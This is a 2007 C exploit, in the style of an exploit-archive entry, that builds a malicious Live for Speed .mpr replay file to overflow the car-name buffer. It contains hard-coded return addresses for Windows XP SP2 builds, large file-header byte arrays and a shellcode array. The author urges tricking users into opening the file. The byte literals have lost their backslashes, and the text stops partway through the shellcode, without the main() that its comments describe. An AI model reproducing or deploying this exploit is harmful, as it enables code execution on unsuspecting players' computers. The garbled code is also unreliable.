# Title : Live for Speed S1/S2/Demo (.mpr replay file) Buffer Overflow Exploit
# Published : 2007-08-01
# Author : n00b
/**
*****
**************************************************************************
0day: Live for Speed patch X (S2/S1 and demo) local .mpr buffer overflow
Credits to n00b for finding the bug and writing the exploit
LFS is a racing simulator with a huge player database of 100,000+ users.
I found a local buffer overflow that lets me execute shellcode
on the user's computer. We can save replays and import replay files
into LFS for viewing, so exploitation is simple: trick a user into opening
the .mpr file (not very hard, trust me). The buffer overflow seems to be in
the car names. We are then able to do a jmp or call esp into our
shellcode. If you want to see the debug information, look at the first PoC
released.
Compile with Dev-C++ 4.9.9.2
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
-------------------------------------------------------------------------
MPR file header format for LFS S2 : 0.5X9
=========================================================================
FILE DESCRIPTION :
==================
num unit offset description
--- ---- ------ -----------
6 char 0 LFSMPR : do not read file if no match
1 byte 6 game version : ignore
1 byte 7 game revision : ignore
1 byte 8 MPR version : ignore
1 byte 9 immediate start : joined already running game
1 byte 10 reserved : -
1 byte 11 reserved : -
1 int 12 rules : -
1 int 16 flags : -
1 byte 20 laps byte : laps / hours (see notes)
1 byte 21 skill : skill level (0,1,2,3,4)
1 byte 22 wind : 0=off 1=weak 2=strong
1 byte 23 num players : players at start of race
8 char 24 LFS version : text, ends 0
4 char 32 short track name : e.g. BL2R
1 int 36 start time (UTC) : seconds from 00:00 1/1/1970
32 char 40 track name : text, ends 0
1 byte 72 config : 1,2,3.. (first config is 1)
1 byte 73 reversed : 0=no 1=yes
1 byte 74 weather : 0,1,2.. (first weather is 0)
1 byte 75 num finished (NF) : players in results table
1 int 76 0 : -
=========================================================================
Vendor's web site: www.liveforspeed.net
Affected versions: Live for Speed S2 ALPHA PATCH 0.5X.
Special thanks to str0ke.
****************************************************************
*****
**/
#include <windows.h>
#include <stdio.h>
#include <conio.h>
// Message printed by main() once the output file has been closed.
#define Credits_to "Credit's to n00b for finding this buffer over flow"
// Output file name; main() opens it with "wb" in the current directory.
#define Mpr_file "exploit.mpr"
//If none of the jmp esp work for you find your own and define it!!
// Exactly one of these three strings is written with fputs() directly after
// the 38 'A' bytes, selected by the first menu in main(). Each trailing comment
// names the module and Windows build the author took the value from.
// NOTE(review): as printed in this copy every escape sequence in the file has
// lost its backslash, so these literals (and the arrays below) are plain ASCII
// text rather than the byte values the comments describe; sizeof() on them
// therefore does not give the byte counts the author intended.
#define JMP_ESP_English "x0AxAFxD8x77" //user32.dll xp sp2 english
#define CALL_ESP_French "x8bx51x81x7c" //Kernel32.dll xp sp2 french
#define JMP_ESP_German "x47x74xd2x77" //user32.dll xp sp2 german
// Opening chunk of the generated replay file. main() writes
// sizeof(file_header1)-1 of it first, before the 38 'A' bytes and the
// address string chosen from the first menu.
// Its first six values, x4c x46 x53 x4d x50 x52, spell "LFSMPR", the magic
// that the format table in the file header requires at offset 0.
// NOTE(review): the escape backslashes appear to be missing in this copy, so
// the declared length here is not the intended byte count.
char file_header1[] =
"x4cx46x53x4dx50x52x00x05x0dx01x30x20x00x08x00x00"
"x23x00x00x00x06x04x00x01x30x2ex35x58x31x30x00x00"
"x46x45x32x00xfexadxadx46x46x65x72x6ex20x42x61x79"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x02x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x46x4fx58x5fx72x69x63x68x6dx6fx6ex64x00x00x00x00"
"x00x00x00x00x48x45x4cx5fx44x45x46x41x55x4cx54";
// Closing chunk of the generated replay file. main() writes
// sizeof(file_header2)-1 of it last, directly after the 353 'B' bytes that
// follow the selected payload array.
// NOTE(review): the escape backslashes appear to be missing in this copy, so
// the declared length here is not the intended byte count.
char file_header2[] =
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x44x04x00x00x00x5ex33x42x75x6ex64x79"
"x72x6fx79x5ex30x99x00x00x00x00x00x00x00x00x00x00"
"x00x5ex33x72x75x6dx70x69x67x01x01x06x02x1ax07x00"
"x00x0cx0dx55x00x00x00x00x00x44x45x46x41x55x4cx54"
"x00x00x00x00x00x00x00x00x00xd4x05x07x00x00x52xd9"
"x8ex66x00xcdxbdx0cx46x4fx52x4dx55x4cx41x20x58x52"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x72x69x63x68x6dx6fx6ex64x00x00"
"x00x00x00x00x00x00xa0xa0xa0x00x0ax0ax0ax00x0ax0a"
"x0ax00x0ax0ax0ax00xa0xa0xa0x00x0ax0ax0ax00x0ax0a"
"x0ax00x0ax0ax0ax00xd1x0ex8dx96xc7x30x28x06x25x55"
"x44xfax8cx08xfex70xfdxb0xfcx70xb6xcax0cx35xcfxde"
"x1ax87xa1x2ex7dx7fxbfx9fxdex9dx8dx66x8ex63x41xbd"
"xa2x44x4cxc0xcbxcbx70x3ax01xa0xd4x61xe7xd5xf9xc0"
"xe8x40x53x59x06x4ax49xc7xa0x81x98x1bxe4xe7x05xa0"
"xdfxe5xf2x9ax57xc0xd0x2fxc1xdcx32x71x44x6bx70x3a"
"x01xa0xd4x61xe7xd5xcbxccxe6xf6xdbx6fxe4xeax4bxe2"
"x8dx54x3bxd5x18x77x43x9cx67x8dx64x7bx22x02x34x02"
"x07xffx1fx00x00x00x00x8axa2x28x00x8axa2xfcx07x00"
"x00x00x00x8axa2x28x00x8axa2xfcx07x00x00x00x00x8a"
"xa2x28x00x8axa2xfcx07x00x00x00x00x8axa2x28x00x8a"
"xa2xfcx07x3cx07x00x01x00x68x6fx73x74x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x3cx07x01x01x00x5ex33x42x75x6ex64x79x72x6fx79x5e"
"x30x99x00x00x00x00x00x00x00x00x00x00x00x5ex33x72"
"x75x6dx70x69x67x62x75x6ex64x79x72x6fx79x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x3cx07x08"
"x00x00x6ex30x30x62x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x6fx6fx6fx6fx6f"
"x48x41x6dx75x68x61x61x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x84x3bx00x00x00x00"
"x00x00x00x00x00xffxffxffxffxffxffx00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x48"
"x13x02x06x14x06x00x01x04x04x00x00x00x00x00x00x00"
"x00x00x00x00x14x00x00x00x46x03x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x1ex00x50x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x65x0ex00x00x97x0exfcx00"
"x35x00x34x55x01x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00xcex0exfcx00x0dx00x0cx28x00"
"x27x3cx00x00x00x00x00x00x00x00xe7x0exfcx00x05x00"
"x04x0cx05x00x00x0ax0fxfex01xc5xd9x07x00xebx85x22"
"x00x41x00xc4x00x70xa8xf6xffx99xf0xfcxfex9cx54x00"
"x00xc9x7fxabxf8x85xffx54x07xc8x7fx1cxffx0axd7x23"
"x3cxfcxffxffxffxf5x92x31x41xf0xf7xc1xf6x85x28x00"
"x00x00x00x00x00x00x00x00x00x40x43x4ax48x4dx0fxfc"
"x00x0ex00x04x0dx15x00x00x08x24x00x00x00x34x3fx34"
"x3fx6ax0fxfcx01x15x00x14x2fx68x7bxabx00x00xccxe5"
"x37x9fx00x00x4ex09xe8x21x0cx29x00xe7x70x0fxfcx02"
"x15x00x14x2fx68x7bxabx00x00xccxe5x37x9fx00x00x4e"
"x09xe8x21x0cx29x00xe7x8bx0fxfex01x46xdax07x00xeb"
"x85x22x00x41x00xc4x00x70xa8xf6xffx99xf0xfcxfex9c"
"x54x00x00xc9x7fxabxf8x84xffx54x07xc8x7fx1cxffx0a"
"xd7x23x3cx8cxf0x3fx00x7ex87xd9x40xf4x7dx07x88x85"
"x28x00x00x00x00x00x00x00x00x00x00x40x43x4ax48x09"
"x10xfcx01x35x00x34x02x07xffx1fx00x00x00x00x8axa2"
"x28x00x8axa2xfcx07x00x00x00x00x8axa2x28x00x8axa2"
"xfcx07x00x00x00x00x8axa2x28x00x8axa2xfcx07x00x00"
"x00x00x8axa2x28x00x8axa2xfcx07x0dx10xfex01xc8xda"
"x07x00xebx85x22x00x41x00xc4x00x70xa8xf6xffx99xf0"
"xfcxfex9dx54x00x00xc9x7fxabxf8x84xffx54x07xc8x7f"
"x1cxffx0axd7x23x3cx58xf0x3fx00x9bxd9x1ax41x04xed"
"xbex89x85x28x00x00x00x00x00x00x00x00x00x00x40x43"
"x4ax48x80x10xfcx00x05x00x04x0cx06x00x00x90x10xfe"
"x01x4bxdbx07x00xebx85x22x00x41x00xc4x00x70xa8xf6"
"xffx99xf0xfcxfex9ex54x00x00xc9x7fxabxf8x85xffx54"
"x07xc8x7fx1bxffx0axd7x23x3cx34xf0x3fx00x39x15x29"
"x41x18xf7xbfxc5x85x28x00x00x00x00x00x00x00x00x00"
"x00x40x43x4ax48xb5x10xfdx02x10x00x01x10x00x00x67"
"x6fx6fx64x20x72x61x63x65x00x00x00xf5x10xfdx02x08"
"x00x01x08x00x00x3ax2dx29x00x13x11xfex01xcexdbx07"
"x00xebx85x22x00x41x00xc4x00x70xa8xf6xffx99xf0xfc"
"xfex9fx54x00x00xc9x7fxabxf8x85xffx54x07xc8x7fx1b"
"xffx0axd7x23x3cx04xf0xffxffx69x4dx88x40xa0x16xc9"
"xc2x85x28x00x00x00x00x00x00x00x00x00x00x40x43x4a"
"x48x48x11xfcx01x05x00x04x0dx16x00x00x95x11xfex01"
"x50xdcx07x00xebx85x22x00x41x00xc4x00x70xa8xf6xff"
"x99xf0xfcxfexa0x54x00x00xc9x7fxabxf8x84xffx54x07"
"xc8x7fx1bxffx0axd7x23x3cx20xf0xffxffx63xcexb9x40"
"x1cxc9x07xc7x85x28x00x00x00x00x00x00x00x00x00x00"
"x40x43x4ax48xa2x11xfcx02x05x00x04x0dx17x00x00x17"
"x12xfex01xd2xdcx07x00xebx85x22x00x41x00xc4x00x70"
"xa8xf6xffx99xf0xfcxfexa0x54x00x00xc9x7fxabxf8x84"
"xffx54x07xc8x7fx1axffx0axd7x23x3cx70x00x00x00x55"
"x24xf0x40x3cx3bx40x99x85x28x00x00x00x00x00x00x00"
"x00x00x00x40x43x4ax48x19x12xfcx00x05x00x04x0cx07"
"x00x00x7fx12xfcx00x05x00x04x0dx13x00x00x9ax12xfe"
"x01x55xddx07x00xebx85x22x00x41x00xc4x00x70xa8xf6"
"xffx99xf0xfcxfexa1x54x00x00xc9x7fxabxf8x85xffx54"
"x07xc8x7fx1axffx0axd7x23x3cx48xd0x3fx00x3fx79x1f"
"x41x4cxd3xffx8bx85x28x00x00x00x00x00x00x00x00x00"
"x00x40x43x4ax48x00x00xffx00";
//shellcode from www.metasploit.com execute calc.exe. 351 byte's
// Payload array written (sizeof-1 bytes) when the second menu in main() is
// answered with 1, which main() labels "Bind to port shell code port 4444".
// NOTE(review): that menu label and the comment above disagree about what
// this array contains, and the `calc_shellcode` array below has the opposite
// mismatch; the two comments look swapped, but neither is verified here.
char shellcode[]=
"xfcxbbxe6x02xd5x0fxebx0cx5ex56x31x1exadx01xc3x85"
"xc0x75xf7xc3xe8xefxffxffxffx1ax68x3ex42x0ax94x3f"
"xa2x35x07x4bx31xedxecxc0x8fxd1x67xaax0ax51x79xbc"
"x9exeex61xc9xfexd0x90x26x49x9bxa7x33x4bx75xf6x83"
"xd5x25x7dxc3x92x32xbfx0ex57x3dxfdx64x9cx06x55x5f"
"x75x0dxb0x14xdaxc9x3bxc0x83x9ax30x5dxc7xc3x54x60"
"x3cxf8x48xe9x4bx92xb4xf1x2axa9x84xd2xc9xa6xa4xd4"
"x9axf8x26x9exedxe4x9bx2bx4dx1cxbax43xc0x52x4cx78"
"x8cx95x86xe6x7ex0fx4fxd4xb2xa7xf8x69x81x68x53x71"
"x35xfex90x60x4axc5x76x84x65x66xfex9fxecx19xedx68"
"xf3x4cx84x6ax0cxbex30xb2xfbxcbx6cx13x03xe5x3cxcf"
"xa8x5ax90xacx1dx1fx45xccx72xf9x01x23x2fx63x81xca"
"x2exfex4dx69xaax70x49x26x34xa6x3fxd9x9bx13x3fx09"
"x73x3fx12x84x6dx68x92x0fx3exc3x93x60xa9x0ex22x07"
